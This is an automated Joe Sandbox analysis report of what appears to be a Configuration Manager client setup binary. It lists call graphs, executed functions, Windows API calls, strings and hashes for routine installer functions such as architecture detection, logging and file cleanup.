79591->79592 79592->79536 79594 62a2f5 __EH_prolog3_catch 79593->79594 79595 5f663a RegCloseKey 79594->79595 79596 62a2fd 79595->79596 79613 62a33c 79596->79613 79647 5ec14b 79596->79647 79598 62a361 79600 62a3a4 79598->79600 79601 62a36a 79598->79601 79599 62a350 79666 5e9009 79599->79666 79603 5f7229 19 API calls 79600->79603 79608 62a376 GetCurrentThreadId 79601->79608 79601->79613 79606 62a3bd 79603->79606 79605 62a535 79607 5f6690 2 API calls 79605->79607 79609 62a3c6 79606->79609 79610 62a3fb 79606->79610 79611 62a541 79607->79611 79608->79613 79609->79613 79615 62a3d6 GetCurrentThreadId 79609->79615 79677 5f6fe7 82 API calls __EH_prolog3_catch 79610->79677 79611->79528 79613->79599 79676 5f0dba 6 API calls 79613->79676 79614 62a40c 79616 62a415 79614->79616 79617 62a44d 79614->79617 79615->79613 79616->79613 79619 62a425 GetCurrentThreadId 79616->79619 79678 5f6fe7 82 API calls __EH_prolog3_catch 79617->79678 79619->79613 79620 62a49f 79679 5f6fe7 82 API calls __EH_prolog3_catch 79620->79679 79622 62a4b0 79624 62a4d2 79622->79624 79626 62a4ba 79622->79626 79623 62a45e 79623->79613 79623->79620 79625 62a477 GetCurrentThreadId 79623->79625 79624->79613 79628 62a4e7 GetCurrentThreadId 79624->79628 79625->79620 79626->79599 79680 5f0dba 6 API calls 79626->79680 79628->79599 79630 5fb9f7 __EH_prolog3 79629->79630 79631 5f663a RegCloseKey 79630->79631 79632 5fb9ff 79631->79632 79633 5ec14b 276 API calls 79632->79633 79634 5fba1d 79633->79634 79635 5f7229 19 API calls 79634->79635 79636 5fba3b 79635->79636 79641 5fba50 79636->79641 79684 5f6bc9 7 API calls __EH_prolog3_catch 79636->79684 79638 5e9009 273 API calls 79639 5fba6a 79638->79639 79640 5f6690 2 API calls 79639->79640 79642 5fba76 79640->79642 79641->79638 79642->79531 79643->79552 79644->79524 79645->79541 79646->79553 79648 5ec157 __EH_prolog3_catch 79647->79648 79649 5ec17c 79648->79649 79650 5ec1d0 79648->79650 79654 5ec18d GetCurrentThreadId 79649->79654 79655 5ec1b7 79649->79655 79682 5787da CloseHandle 79650->79682 79652 5ec1d7 GetCurrentThread OpenThreadToken 79653 5ec1ed RevertToSelf 79652->79653 79665 5ec248 79652->79665 79656 5ec1f7 GetLastError 79653->79656 79653->79665 79654->79655 79662 5ec1c7 79655->79662 79681 5f0dba 6 API calls 79655->79681 79658 5ec212 79656->79658 79656->79665 79663 5ec21e GetCurrentThreadId 79658->79663 79658->79665 79659 5ec258 79661 5ec2ab 79659->79661 79659->79662 79661->79598 79662->79661 79664 592624 269 API calls 79662->79664 79663->79665 79664->79661 79665->79659 79683 5f0dba 6 API calls 79665->79683 79667 5e9015 __EH_prolog3 79666->79667 79668 5e9024 RevertToSelf 79667->79668 79675 5e9070 79667->79675 79669 5e902f ImpersonateLoggedOnUser 79668->79669 79668->79675 79672 5e903b 79669->79672 79669->79675 79670 5e907c CloseHandle 79671 5e9087 79670->79671 79671->79605 79673 5e9046 GetLastError 79672->79673 79672->79675 79674 592624 269 API calls 79673->79674 79674->79675 79675->79670 79675->79671 79676->79599 79677->79614 79678->79623 79679->79622 79680->79599 79681->79662 79682->79652 79683->79659 79684->79641

                                                                                          Executed Functions

                                                                                          Function 005FB59B Relevance: 70.2, APIs: 13, Strings: 27, Instructions: 198threadlibraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2416 5fb59b-5fb60a call 5d22be call 6743a3 call 5f52cb GetSystemInfo 2423 5fb69c-5fb6b8 call 5f511f GetModuleHandleW 2416->2423 2424 5fb610-5fb613 2416->2424 2434 5fb71d-5fb73e GetProcAddress * 2 2423->2434 2435 5fb6ba-5fb6d8 GetLastError call 5f0b53 2423->2435 2426 5fb68e 2424->2426 2427 5fb615-5fb618 2424->2427 2428 5fb693-5fb69a call 5f511f 2426->2428 2430 5fb61a-5fb62b call 5f0b53 2427->2430 2431 5fb687-5fb68c 2427->2431 2438 5fb707-5fb70d 2428->2438 2442 5fb65d-5fb682 2430->2442 2443 5fb62d-5fb65a GetCurrentThreadId call 5f1811 2430->2443 2431->2428 2434->2438 2439 5fb740-5fb742 2434->2439 2435->2438 2447 5fb6da-5fb6f8 GetCurrentThreadId 2435->2447 2444 5fb70f call 5f0dba 2438->2444 2445 5fb714-5fb864 call 5d2223 2438->2445 2439->2438 2446 5fb744-5fb754 GetCurrentProcess 2439->2446 2449 5fb839-5fb842 call 592624 2442->2449 2443->2442 2444->2445 2460 5fb79e-5fb7a2 2446->2460 2461 5fb756-5fb774 GetLastError call 5f0b53 2446->2461 2453 5fb6fd-5fb704 call 5f1811 2447->2453 2449->2438 2453->2438 2460->2438 2462 5fb7a8-5fb7b5 GetNativeSystemInfo 2460->2462 2461->2438 2468 5fb776-5fb799 GetCurrentThreadId 2461->2468 2466 5fb7b7 2462->2466 2467 5fb7c4-5fb7cb 2462->2467 2469 5fb7bc 2466->2469 2470 5fb7cd-5fb7d2 2467->2470 2471 5fb7d4-5fb7e5 call 5f0b53 2467->2471 2468->2453 2469->2467 2470->2469 2474 5fb817-5fb836 2471->2474 2475 5fb7e7-5fb814 GetCurrentThreadId call 5f1811 2471->2475 2474->2449 2475->2474
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005FB5A2
                                                                                          • GetSystemInfo.KERNEL32(?,00000000,000000FF,CCM::Utility::GetProcessorArchitecture,0000007C,005B5198,?,DetectPlatform,0000004C,005A6602,?,?,CcmSetupManifest::GetApplicableInstallList,00000148,005A57F2,?), ref: 005FB5FB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB642
                                                                                          • GetModuleHandleW.KERNEL32(kernel32,x86), ref: 005FB6AD
                                                                                          • GetLastError.KERNEL32 ref: 005FB6BA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB6F0
                                                                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 005FB729
                                                                                          • GetProcAddress.KERNEL32(?,GetNativeSystemInfo), ref: 005FB736
                                                                                          • GetCurrentProcess.KERNEL32(?), ref: 005FB748
                                                                                          • GetLastError.KERNEL32 ref: 005FB756
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB78C
                                                                                          • GetNativeSystemInfo.KERNEL32(?), ref: 005FB7AC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FB7FC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$Thread$AddressErrorInfoLastProcSystem$H_prolog3_catchHandleModuleNativeProcess
                                                                                          • String ID: qs$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(hKernel32 = GetModuleHandleW(L"kernel32")) != 0$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$0ts$CCM::Utility::GetProcessorArchitecture$FALSE$FALSE$GetNativeSystemInfo$IsWow64Process$Unknown system architecture %d$Unknown system architecture %d$amd64$ia64$kernel32$pfnIsWow64Process(GetCurrentProcess(), &bIsWow64)$x86
                                                                                          • API String ID: 1896194167-1866863839
                                                                                          • Opcode ID: 52994c73459db24b919b35fc5e0397b7a61c5cd4764ec42b4dbabab2403823dc
                                                                                          • Instruction ID: 437ffe9ffb73b0b5d8241632dddc53fbd58052c6aeb1801e02d671baa163ba9a
                                                                                          • Opcode Fuzzy Hash: 52994c73459db24b919b35fc5e0397b7a61c5cd4764ec42b4dbabab2403823dc
                                                                                          • Instruction Fuzzy Hash: A061E8B1A80319EAFF14AB61CC0ABBD7EA9BF84B54F148016F604B71C2DB7C4945C7A1
                                                                                          Function 005F094C Relevance: 28.1, APIs: 6, Strings: 10, Instructions: 124threadtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F0956
                                                                                            • Part of subcall function 005F07A0: __EH_prolog3.LIBCMT ref: 005F07A7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F09AC
                                                                                          • GetCurrentThread.KERNEL32 ref: 005F0A79
                                                                                          • GetThreadTimes.KERNEL32(00000000), ref: 005F0A80
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 005F0A8D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F0AF4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$Current$Time$FileH_prolog3H_prolog3_catch_SystemTimes
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$Failed to load logging configuration for '%s' (%08lx)$PushThreadComponent(ComponentStackInfo)$hrq$pszComponentName != 0
                                                                                          • API String ID: 2110536068-644369641
                                                                                          • Opcode ID: 8c2899970d16359992539f42273bf18b457a4b3db19772a3e08d9b890fe8830f
                                                                                          • Instruction ID: 432300db722dd4324b943a17c61ad1ceefda293f907e800b6df0b649835a621a
                                                                                          • Opcode Fuzzy Hash: 8c2899970d16359992539f42273bf18b457a4b3db19772a3e08d9b890fe8830f
                                                                                          • Instruction Fuzzy Hash: 7A41D1B1D4526DAADB21DB648D4ABEEBEB8BB55304F045185F248632C2DAB84F84CF50
                                                                                          Function 0057E422 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 171fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0057E42C
                                                                                            • Part of subcall function 005F41CA: __EH_prolog3.LIBCMT ref: 005F41D1
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0057E508
                                                                                            • Part of subcall function 00578174: FindClose.KERNEL32 ref: 00578183
                                                                                          • GetLastError.KERNEL32 ref: 0057E525
                                                                                          • DeleteFileW.KERNEL32(00000001,00000001,?,?), ref: 0057E58E
                                                                                          • GetLastError.KERNEL32(00000002), ref: 0057E5C3
                                                                                          • FindNextFileW.KERNEL32(?,00000010), ref: 0057E5FE
                                                                                          • FindClose.KERNEL32(?,00000001,00000000), ref: 0057E6A6
                                                                                          Strings
                                                                                          • DeleteFilesFromDownloadFolder failed with error 0x%x, xrefs: 0057E67B
                                                                                          • CcmSetup::DeleteFilesFromDownloadFolder, xrefs: 0057E4D4
                                                                                          • Failed to delete file %s. Error %d, xrefs: 0057E5CB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseErrorLast$DeleteFirstH_prolog3H_prolog3_catch_Next
                                                                                          • String ID: CcmSetup::DeleteFilesFromDownloadFolder$DeleteFilesFromDownloadFolder failed with error 0x%x$Failed to delete file %s. Error %d
                                                                                          • API String ID: 2780982994-501919274
                                                                                          • Opcode ID: 7747c4ffad4be6943f1908b153b91ba543c9bb37f541eb64d0cd148eb225dc78
                                                                                          • Instruction ID: 9106ff1e6c439d843dee182cd028f0be53da1aa70f2a255d72aefd18feed4a38
                                                                                          • Opcode Fuzzy Hash: 7747c4ffad4be6943f1908b153b91ba543c9bb37f541eb64d0cd148eb225dc78
                                                                                          • Instruction Fuzzy Hash: 7761AB71900249EAEF10EBA4CD4EBDEBFB9BF15314F104299E104A7182DBB45F49CB61
                                                                                          Function 005F10F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114timethreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F10FA
                                                                                          • GetLocalTime.KERNEL32(?), ref: 005F1161
                                                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 005F116E
                                                                                          • _wcsrchr.LIBCMT ref: 005F11AA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F11F9
                                                                                          Strings
                                                                                          • <![LOG[%s]LOG]!><time="%02u:%02u:%02u.%03u%+03d" date="%02u-%02u-%04u" component="%s" context="%s" type="%u" thread="%lu" file="%s, xrefs: 005F125F
                                                                                          • %s:%lu, xrefs: 005F11C0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$CurrentH_prolog3_catch_InformationLocalThreadZone_wcsrchr
                                                                                          • String ID: %s:%lu$<![LOG[%s]LOG]!><time="%02u:%02u:%02u.%03u%+03d" date="%02u-%02u-%04u" component="%s" context="%s" type="%u" thread="%lu" file="%s
                                                                                          • API String ID: 2050430538-2710396948
                                                                                          • Opcode ID: 8ab1c6dce60daf0e16d4d7701bfd5647adbe490adbb0e533195f6d0b576e0168
                                                                                          • Instruction ID: 31f94d2d3b3c31cf63740973b14279cb8266f977a1a8c105503d94b2be9657e9
                                                                                          • Opcode Fuzzy Hash: 8ab1c6dce60daf0e16d4d7701bfd5647adbe490adbb0e533195f6d0b576e0168
                                                                                          • Instruction Fuzzy Hash: F8410C7190156EEBCF25CFA5CD05BFE7BB9BB08710F044096BA48E6240E6389E90DF65
                                                                                          Function 006158BF Relevance: 6.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • HeapCreate.KERNEL32(00000000,00200000,00000000,?,?,?,?,005713AA), ref: 006158D2
                                                                                          • HeapQueryInformation.KERNEL32(?,00000000,?,00000004,00000000,?,?,?,?,005713AA), ref: 006158F4
                                                                                          • HeapSetInformation.KERNEL32(?,00000000,?,00000004,?,00000000,?,00000004,00000000,?,?,?,?,005713AA), ref: 00615912
                                                                                          • GetProcessHeap.KERNEL32(?,?,?,?,005713AA), ref: 00615925
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Information$CreateProcessQuery
                                                                                          • String ID:
                                                                                          • API String ID: 444772348-0
                                                                                          • Opcode ID: d3d86f597078df3cc7eaf5ecab0582870be142dfc0d03d42b0c2ac6316e89bf3
                                                                                          • Instruction ID: deae85769d06b3d102195119888c87b9e1004bd75f32e3beb3b7affa712270e5
                                                                                          • Opcode Fuzzy Hash: d3d86f597078df3cc7eaf5ecab0582870be142dfc0d03d42b0c2ac6316e89bf3
                                                                                          • Instruction Fuzzy Hash: 2F0192B0500349FFEB208FA0DC85EA6FBADEB40361F18086EF586D3251D6724D40D761
                                                                                          Function 00604016 Relevance: 1.5, APIs: 1, Instructions: 12comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CoCreateInstance.OLE32(?,00000000,00000064,00748784,00000000,?,00603441,008DCE2C,00000017,CCM::Utility::Wmi::Namespace::Open), ref: 0060402E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateInstance
                                                                                          • String ID:
                                                                                          • API String ID: 542301482-0
                                                                                          • Opcode ID: c16d0d4e976f4682170ad4cc86695d41203f79729e9dca9434c7c6bdfa48f110
                                                                                          • Instruction ID: bb2a1b71c712651959de20834509378a85e618cf57d8823c521105a156e4a4cd
                                                                                          • Opcode Fuzzy Hash: c16d0d4e976f4682170ad4cc86695d41203f79729e9dca9434c7c6bdfa48f110
                                                                                          • Instruction Fuzzy Hash: 7DC08C3208020CBFDBA12F80DC0AF9A3F1EEB94720F508001B91824061CBB2A9209650
                                                                                          Function 006422A5 Relevance: 198.6, APIs: 21, Strings: 92, Instructions: 819threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 6422a5-6423b6 call 5d22f4 call 5f419f * 3 call 63bf44 call 5f419f call 6743a3 call 5f52cb call 64376c 19 6423de-6423e5 call 5f0b53 0->19 20 6423b8-6423bd 0->20 28 6423e7-6423ef call 5f3b94 19->28 29 64241e-642434 call 648930 19->29 21 6423c3-6423ce 20->21 23 6423d5-6423d9 21->23 24 6423d0 call 5f0dba 21->24 27 642ec7-642ed0 call 5f52cb 23->27 24->23 35 642ed5-642edc 27->35 28->29 38 6423f1-64241d call 592624 28->38 36 6424bd-6424d0 call 641581 29->36 37 64243a-64244c call 5f0b53 29->37 39 642ef1-642ef8 35->39 40 642ede-642eed 35->40 50 642537-64253b 36->50 51 6424d2-6424e4 call 5f0b53 36->51 53 642475-642494 37->53 54 64244e-642472 GetCurrentThreadId call 5f1811 37->54 38->29 44 642f0c-642f81 call 59f01d call 59ef10 call 63bfaa call 63df79 call 59ef10 * 3 39->44 45 642efa-642f08 39->45 40->39 116 642f83-642f85 44->116 117 642f89-642f95 44->117 45->44 59 642566-64257a 50->59 60 64253d-642561 call 5f511f call 64a73e 50->60 69 6424e6-64250a GetCurrentThreadId call 5f1811 51->69 70 64250d-642532 51->70 58 64249a-6424a1 call 592624 53->58 54->53 79 6424a2-6424ad 58->79 66 64257c-642590 call 5f0b53 59->66 67 6425ca-6425e4 call 640d56 59->67 60->59 66->21 81 642596-6425c5 GetCurrentThreadId call 5f1811 66->81 84 6425e6-6425f8 call 5f0b53 67->84 85 64264b-642653 call 5f3b94 67->85 69->70 70->58 86 6424b4-6424b8 79->86 87 6424af call 5f0dba 79->87 81->21 101 642621-642640 84->101 102 6425fa-64261e GetCurrentThreadId call 5f1811 84->102 98 642655-642681 call 592624 85->98 99 642682-6426b3 call 649521 85->99 93 642ec3-642ec5 86->93 87->86 93->27 93->35 98->99 111 6426b5-6426c2 call 5f0b53 99->111 112 6426f9-642715 99->112 101->85 102->101 111->79 124 6426c8-6426e6 GetCurrentThreadId 111->124 122 642754-64275a 112->122 123 642717-642726 call 5f0b53 112->123 116->117 120 642f97-642f99 117->120 121 642f9d-642fa4 call 5d2246 117->121 120->121 127 642760-642773 call 64a27e 122->127 128 642918-64291f 122->128 123->79 137 64272c-642752 GetCurrentThreadId 123->137 129 6426eb-6426f4 call 5f1811 124->129 142 642871-64288d 127->142 143 642779-6427a1 127->143 133 642921-642933 128->133 134 642939-64295a call 640e87 128->134 129->79 133->134 144 6429c1-6429c5 134->144 145 64295c-64296e call 5f0b53 134->145 137->129 142->122 151 642893-6428a2 call 5f0b53 142->151 155 6427a3-6427b0 call 5f0b53 143->155 156 6427de-6427ec 143->156 148 6429c7-6429db call 5f0b53 144->148 149 642a0c-642a3d call 649521 144->149 161 642997-6429b6 145->161 162 642970-642994 GetCurrentThreadId call 5f1811 145->162 148->21 165 6429e1-642a02 GetCurrentThreadId 148->165 169 642a3f-642a4c call 5f0b53 149->169 170 642a7a-642a98 149->170 151->79 175 6428a8-6428c9 GetCurrentThreadId 151->175 155->79 173 6427b6-6427d9 GetCurrentThreadId 155->173 157 6427f2-64280c call 640801 156->157 158 6428d3-6428e7 call 5f0b53 156->158 179 64280e-64281b call 5f0b53 157->179 180 642849-64286b call 5a0532 157->180 158->21 182 6428ed-64290e GetCurrentThreadId 158->182 161->144 162->161 165->149 169->79 185 642a52-642a70 GetCurrentThreadId 169->185 187 642ad8-642ade 170->187 188 642a9a-642aa7 call 5f0b53 170->188 173->129 175->158 179->79 195 642821-64283f GetCurrentThreadId 179->195 180->142 182->128 185->170 189 642ae0-642af4 call 5f0b53 187->189 190 642b31-642b4d 187->190 188->79 199 642aad-642ace GetCurrentThreadId 188->199 189->21 203 642afa-642b1b GetCurrentThreadId 189->203 196 642b53-642b66 call 64a27e 190->196 197 642cbb-642cd8 190->197 195->180 196->197 206 642b6c-642b94 196->206 207 642b25-642b2b 197->207 208 642cde-642ce8 197->208 199->187 203->207 215 642b96-642ba3 call 5f0b53 206->215 216 642bd1-642bdf 206->216 207->190 209 642d64-642d6d 207->209 208->207 210 642cee-642cfb call 5f0b53 208->210 211 642d6f-642d78 call 5f3b94 209->211 212 642de9-642df3 209->212 222 642d2c-642d5c call 592624 210->222 223 642cfd-642d29 GetCurrentThreadId call 5f1811 210->223 235 642dad-642db6 call 5f3b94 211->235 236 642d7a-642daa call 592624 211->236 218 642df5-642e09 call 5f0b53 212->218 219 642e3a-642e43 call 5f3b94 212->219 215->79 239 642ba9-642bc7 GetCurrentThreadId 215->239 224 642c26-642c3d call 640801 216->224 225 642be1-642bf5 call 5f0b53 216->225 218->21 243 642e0f-642e30 GetCurrentThreadId 218->243 246 642e84-642e8f 219->246 247 642e45-642e49 219->247 222->209 223->222 252 642c3f-642c4c call 5f0b53 224->252 253 642c7a-642caf call 648cad 224->253 225->21 251 642bfb-642c1c GetCurrentThreadId 225->251 235->212 258 642db8-642de8 call 592624 235->258 236->235 239->216 243->219 249 642e96-642e9d 246->249 250 642e91 call 5f0dba 246->250 255 642e4f 247->255 256 642e4b-642e4d 247->256 249->93 250->249 251->224 252->79 265 642c52-642c70 GetCurrentThreadId 252->265 253->197 270 642cb1-642cb6 call 5f52cb 253->270 257 642e51-642e81 call 592624 255->257 256->257 257->246 258->212 265->253 270->197
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006422AF
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 0063BF44: __EH_prolog3.LIBCMT ref: 0063BF4B
                                                                                            • Part of subcall function 0064376C: __EH_prolog3_catch_GS.LIBCMT ref: 00643776
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0064245F
                                                                                            • Part of subcall function 00641581: __EH_prolog3_catch.LIBCMT ref: 00641588
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006424F7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006425AB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0064260B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006426DE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642741
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006427CC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642837
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006428BD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642981
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006429F6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642A68
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642AC2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642B0F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642BBF
                                                                                            • Part of subcall function 00640801: GetCurrentThreadId.KERNEL32 ref: 006408F1
                                                                                            • Part of subcall function 00640801: IsTextUnicode.ADVAPI32(?,?,00000000), ref: 0064090E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642C10
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642902
                                                                                            • Part of subcall function 00640801: __EH_prolog3_catch.LIBCMT ref: 00640808
